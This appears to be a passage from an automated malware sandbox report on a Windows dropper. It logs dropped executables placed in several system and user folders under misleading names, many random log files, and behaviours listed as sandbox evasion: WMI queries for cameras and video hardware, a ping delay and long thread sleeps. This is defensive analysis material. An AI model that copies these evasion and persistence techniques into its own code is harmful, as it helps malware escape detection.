                                  Source: o9jDrpZrgR.exeStatic PE information: section name: .didat
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile created: C:\reviewruntimeMonitor\__tmp_rar_sfx_access_check_7071296Jump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\ESwXjeKp.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\lGVRPIpa.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\SoilvDeL.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\BhRGcQzx.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\qtmQsFEO.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\hLTAIczh.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\QJNvoZJT.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\GVjFENOl.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\eQQkRcVr.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\HJnNqbKj.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\pwLIWFpU.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\fNssmckm.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Desktop\NBQmTGPX.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\vnjhvXId.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\egSCbkdO.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\MTqwIPIz.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\BfMGYDNR.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\sCEQoKxk.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\jTkAEhsC.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\eOLjNPjM.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\KWPomPtF.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\BnwYCmoX.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\zdaXCUIW.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\gRySjyoH.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\XieCzWia.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeFile created: C:\Users\user\Desktop\GbOXfjDL.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeFile created: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exeJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile created: C:\Recovery\qBJICEqiLNwXNBLrN.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe TID: 5508 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 5376 Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -28592453314249787s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -600000s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599878s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599750s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599641s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599516s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599391s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599281s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 6056 Thread sleep time: -10800000s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599172s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -599062s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598953s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598843s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598734s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598625s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598515s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598406s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598297s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598163s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -598047s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597938s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597813s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597703s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597594s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597484s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597375s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597266s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597156s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -597047s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596938s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596828s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596719s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596609s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596500s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596391s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596281s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596172s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -596063s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595938s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595813s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595688s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595563s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595453s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595344s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595234s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595125s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -595015s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -594906s >= -30000s
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220 Thread sleep time: -594797s >= -30000s
